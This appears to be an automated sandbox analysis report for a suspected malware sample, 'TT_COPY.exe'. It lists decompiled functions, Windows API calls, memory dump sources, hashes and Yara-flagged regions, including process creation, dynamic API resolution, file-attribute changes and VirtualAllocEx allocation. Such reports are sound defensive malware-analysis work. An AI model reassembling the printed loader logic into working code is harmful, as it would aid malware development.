                                                                                                                            0x00405b56
                                                                                                                            0x00000000
                                                                                                                            0x00405b5c
                                                                                                                            0x00405b60

                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405B56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3712363035-0
                                                                                                                            • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                                                            • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                                                                                                                            • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                                                            • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040690A(signed int _a4) {
                                                                                                                            				struct HINSTANCE__* _t5;
                                                                                                                            				signed int _t10;
                                                                                                                            
                                                                                                                            				_t10 = _a4 << 3;
                                                                                                                            				_t8 =  *(_t10 + 0x40a3e0);
                                                                                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                                                                            				if(_t5 != 0) {
                                                                                                                            					L2:
                                                                                                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                                                                            				}
                                                                                                                            				_t5 = E0040689A(_t8); // executed
                                                                                                                            				if(_t5 == 0) {
                                                                                                                            					return 0;
                                                                                                                            				}
                                                                                                                            				goto L2;
                                                                                                                            			}





                                                                                                                            0x00406912
                                                                                                                            0x00406915
                                                                                                                            0x0040691c
                                                                                                                            0x00406924
                                                                                                                            0x00406930
                                                                                                                            0x00000000
                                                                                                                            0x00406937
                                                                                                                            0x00406927
                                                                                                                            0x0040692e
                                                                                                                            0x00000000
                                                                                                                            0x0040693f
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                              • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                              • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                              • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2547128583-0
                                                                                                                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                            • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                            • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00402C05(signed int __eax) {
                                                                                                                            				RECT* _t10;
                                                                                                                            				void* _t16;
                                                                                                                            
                                                                                                                            				SendMessageW( *(_t16 - 8), 0xb,  *0x42f268 & __eax, _t10); // executed
                                                                                                                            				if( *((intOrPtr*)(_t16 - 0x30)) != _t10) {
                                                                                                                            					InvalidateRect( *(_t16 - 8), _t10, _t10);
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t16 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}





                                                                                                                            0x00402c14
                                                                                                                            0x00402c1d
                                                                                                                            0x00402c24
                                                                                                                            0x00402c24
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000000B,?), ref: 00402C14
                                                                                                                            • InvalidateRect.USER32(?), ref: 00402C24
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InvalidateMessageRectSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 909852535-0
                                                                                                                            • Opcode ID: 0509652848a83ac1d7feddac23dc24ced32f84c0220a85d8a6f2313ae5a63aab
                                                                                                                            • Instruction ID: 5efb85e177e5feb05262591b5578bbf68be0fc1facb886aaf0ec985341d6bcc2
                                                                                                                            • Opcode Fuzzy Hash: 0509652848a83ac1d7feddac23dc24ced32f84c0220a85d8a6f2313ae5a63aab
                                                                                                                            • Instruction Fuzzy Hash: CEE08C72700008FFEB01CBA4EE84DAEB779FB40315B00007AF502A00A0D7300D40DA28
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 68%
                                                                                                                            			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                                                                                            				signed int _t5;
                                                                                                                            				void* _t6;
                                                                                                                            
                                                                                                                            				_t5 = GetFileAttributesW(_a4); // executed
                                                                                                                            				asm("sbb ecx, ecx");
                                                                                                                            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                            				return _t6;
                                                                                                                            			}





                                                                                                                            0x00406031
                                                                                                                            0x0040603e
                                                                                                                            0x00406053
                                                                                                                            0x00406059

                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\TT_COPY.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 415043291-0
                                                                                                                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00406008(WCHAR* _a4) {
                                                                                                                            				signed char _t3;
                                                                                                                            				signed char _t7;
                                                                                                                            
                                                                                                                            				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                                            				_t7 = _t3;
                                                                                                                            				if(_t7 != 0xffffffff) {
                                                                                                                            					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                                                            				}
                                                                                                                            				return _t7;
                                                                                                                            			}





                                                                                                                            0x0040600d
                                                                                                                            0x00406013
                                                                                                                            0x00406018
                                                                                                                            0x00406021
                                                                                                                            0x00406021
                                                                                                                            0x0040602a

                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                            • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                            • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405AEB(WCHAR* _a4) {
                                                                                                                            				int _t2;
                                                                                                                            
                                                                                                                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                                                            				if(_t2 == 0) {
                                                                                                                            					return GetLastError();
                                                                                                                            				}
                                                                                                                            				return 0;
                                                                                                                            			}




                                                                                                                            0x00405af1
                                                                                                                            0x00405af9
                                                                                                                            0x00000000
                                                                                                                            0x00405aff
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                            • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1375471231-0
                                                                                                                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                            • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                            • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: f18254b47b7d35fe166df5a20384049baccdeb9b80bc425d2c8b2fa8f9499aec
                                                                                                                            • Instruction ID: 36773dcc3844b3626b62c70c57042340c0aaa30036c4d42ebb4788d47fc353b4
                                                                                                                            • Opcode Fuzzy Hash: f18254b47b7d35fe166df5a20384049baccdeb9b80bc425d2c8b2fa8f9499aec
                                                                                                                            • Instruction Fuzzy Hash: 5651AA71A04309EFDB34CF59C988BEA37B6BF59350F098069EC09AB201D774AE41CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 28%
                                                                                                                            			E70B52B98(void* __ecx, intOrPtr _a4) {
                                                                                                                            				signed int _v8;
                                                                                                                            				void* _t28;
                                                                                                                            				void* _t29;
                                                                                                                            				void* _t33;
                                                                                                                            				void* _t37;
                                                                                                                            				void* _t40;
                                                                                                                            				void* _t45;
                                                                                                                            				void* _t49;
                                                                                                                            				signed int _t56;
                                                                                                                            				void* _t61;
                                                                                                                            				void* _t70;
                                                                                                                            				intOrPtr _t72;
                                                                                                                            				signed int _t77;
                                                                                                                            				intOrPtr _t79;
                                                                                                                            				intOrPtr _t80;
                                                                                                                            				void* _t81;
                                                                                                                            				void* _t87;
                                                                                                                            				void* _t88;
                                                                                                                            				void* _t89;
                                                                                                                            				void* _t90;
                                                                                                                            				intOrPtr _t93;
                                                                                                                            				intOrPtr _t94;
                                                                                                                            
                                                                                                                            				if( *0x70b55050 != 0 && E70B52ADB(_a4) == 0) {
                                                                                                                            					 *0x70b55054 = _t93;
                                                                                                                            					if( *0x70b5504c != 0) {
                                                                                                                            						_t93 =  *0x70b5504c;
                                                                                                                            					} else {
                                                                                                                            						E70B530C0(E70B52AD5(), __ecx);
                                                                                                                            						 *0x70b5504c = _t93;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				_t28 = E70B52B09(_a4);
                                                                                                                            				_t94 = _t93 + 4;
                                                                                                                            				if(_t28 <= 0) {
                                                                                                                            					L9:
                                                                                                                            					_t29 = E70B52AFD();
                                                                                                                            					_t72 = _a4;
                                                                                                                            					_t79 =  *0x70b55058;
                                                                                                                            					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                                                                            					 *0x70b55058 = _t72;
                                                                                                                            					E70B52AF7();
                                                                                                                            					_t33 = VirtualAllocEx(??, ??, ??, ??, ??); // executed
                                                                                                                            					 *0x70b55034 = _t33;
                                                                                                                            					 *0x70b55038 = _t79;
                                                                                                                            					if( *0x70b55050 != 0 && E70B52ADB( *0x70b55058) == 0) {
                                                                                                                            						 *0x70b5504c = _t94;
                                                                                                                            						_t94 =  *0x70b55054;
                                                                                                                            					}
                                                                                                                            					_t80 =  *0x70b55058;
                                                                                                                            					_a4 = _t80;
                                                                                                                            					 *0x70b55058 =  *((intOrPtr*)(E70B52AFD() + _t80));
                                                                                                                            					_t37 = E70B52AE9(_t80);
                                                                                                                            					_pop(_t81);
                                                                                                                            					if(_t37 != 0) {
                                                                                                                            						_t40 = E70B52B09(_t81);
                                                                                                                            						if(_t40 > 0) {
                                                                                                                            							_push(_t40);
                                                                                                                            							_push(E70B52B14() + _a4 + _v8);
                                                                                                                            							_push(E70B52B1E());
                                                                                                                            							if( *0x70b55050 <= 0 || E70B52ADB(_a4) != 0) {
                                                                                                                            								_pop(_t88);
                                                                                                                            								_pop(_t45);
                                                                                                                            								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                                                                            								if(__eflags == 0) {
                                                                                                                            								}
                                                                                                                            								asm("loop 0xfffffff5");
                                                                                                                            							} else {
                                                                                                                            								_pop(_t89);
                                                                                                                            								_pop(_t49);
                                                                                                                            								 *0x70b5504c =  *0x70b5504c +  *(_t89 + _t49) * 4;
                                                                                                                            								asm("loop 0xffffffeb");
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					_t107 =  *0x70b55058;
                                                                                                                            					if( *0x70b55058 == 0) {
                                                                                                                            						 *0x70b5504c = 0;
                                                                                                                            					}
                                                                                                                            					E70B52B42(_t107, _a4,  *0x70b55034,  *0x70b55038);
                                                                                                                            					return _a4;
                                                                                                                            				}
                                                                                                                            				_push(E70B52B14() + _a4);
                                                                                                                            				_t56 = E70B52B1A();
                                                                                                                            				_v8 = _t56;
                                                                                                                            				_t77 = _t28;
                                                                                                                            				_push(_t68 + _t56 * _t77);
                                                                                                                            				_t70 = E70B52B26();
                                                                                                                            				_t87 = E70B52B22();
                                                                                                                            				_t90 = E70B52B1E();
                                                                                                                            				_t61 = _t77;
                                                                                                                            				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                                                                            					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                                                                            				}
                                                                                                                            				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                                                                            				asm("loop 0xfffffff1");
                                                                                                                            				goto L9;
                                                                                                                            			}

























                                                                                                                            0x70b52ba8
                                                                                                                            0x70b52bb9
                                                                                                                            0x70b52bc6
                                                                                                                            0x70b52bda
                                                                                                                            0x70b52bc8
                                                                                                                            0x70b52bcd
                                                                                                                            0x70b52bd2
                                                                                                                            0x70b52bd2
                                                                                                                            0x70b52bc6
                                                                                                                            0x70b52be3
                                                                                                                            0x70b52be8
                                                                                                                            0x70b52bee
                                                                                                                            0x70b52c32
                                                                                                                            0x70b52c32
                                                                                                                            0x70b52c37
                                                                                                                            0x70b52c3c
                                                                                                                            0x70b52c42
                                                                                                                            0x70b52c44
                                                                                                                            0x70b52c4a
                                                                                                                            0x70b52c57
                                                                                                                            0x70b52c59
                                                                                                                            0x70b52c5e
                                                                                                                            0x70b52c6b
                                                                                                                            0x70b52c7e
                                                                                                                            0x70b52c84
                                                                                                                            0x70b52c8a
                                                                                                                            0x70b52c8b
                                                                                                                            0x70b52c91
                                                                                                                            0x70b52c9d
                                                                                                                            0x70b52ca3
                                                                                                                            0x70b52cab
                                                                                                                            0x70b52cac
                                                                                                                            0x70b52caf
                                                                                                                            0x70b52cba
                                                                                                                            0x70b52cbc
                                                                                                                            0x70b52cc8
                                                                                                                            0x70b52cce
                                                                                                                            0x70b52cd6
                                                                                                                            0x70b52d02
                                                                                                                            0x70b52d03
                                                                                                                            0x70b52d05
                                                                                                                            0x70b52d09
                                                                                                                            0x70b52d09
                                                                                                                            0x70b52d10
                                                                                                                            0x70b52ce6
                                                                                                                            0x70b52ce6
                                                                                                                            0x70b52ce7
                                                                                                                            0x70b52cf5
                                                                                                                            0x70b52cfe
                                                                                                                            0x70b52cfe
                                                                                                                            0x70b52cd6
                                                                                                                            0x70b52cba
                                                                                                                            0x70b52d12
                                                                                                                            0x70b52d19
                                                                                                                            0x70b52d1b
                                                                                                                            0x70b52d1b
                                                                                                                            0x70b52d34
                                                                                                                            0x70b52d42
                                                                                                                            0x70b52d42
                                                                                                                            0x70b52bf9
                                                                                                                            0x70b52bfa
                                                                                                                            0x70b52bff
                                                                                                                            0x70b52c03
                                                                                                                            0x70b52c08
                                                                                                                            0x70b52c1c
                                                                                                                            0x70b52c1d
                                                                                                                            0x70b52c1e
                                                                                                                            0x70b52c20
                                                                                                                            0x70b52c25
                                                                                                                            0x70b52c27
                                                                                                                            0x70b52c27
                                                                                                                            0x70b52c2a
                                                                                                                            0x70b52c30
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • VirtualAllocEx.KERNELBASE(00000000), ref: 70B52C57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 2056deef4c04bbe09db656b041b972e10d9f5ea2f239f35e039e37c6dda1d07e
                                                                                                                            • Instruction ID: af1ce0cca95a46194f8bb2b73edf46437fa88029e7e71bf90bacace0e212ef0b
                                                                                                                            • Opcode Fuzzy Hash: 2056deef4c04bbe09db656b041b972e10d9f5ea2f239f35e039e37c6dda1d07e
                                                                                                                            • Instruction Fuzzy Hash: DC41A1B2502204DFDB229F65DCD2B4D37F4EB06311F3484E9F805C71A0EA38AB888B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 93cf21f286b2932bd0cc52a248c61fd2ae8c9038cdc68ecc67597194f0486157
                                                                                                                            • Instruction ID: 935b42e3bc872a35c02c0aecfd04d50a15a83df9ad00df094a95f25962547634
                                                                                                                            • Opcode Fuzzy Hash: 93cf21f286b2932bd0cc52a248c61fd2ae8c9038cdc68ecc67597194f0486157
                                                                                                                            • Instruction Fuzzy Hash: 41413771A003599BDB319F6989887EA7BA6FF597A0F94406AEC0DDB200D7714E42CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
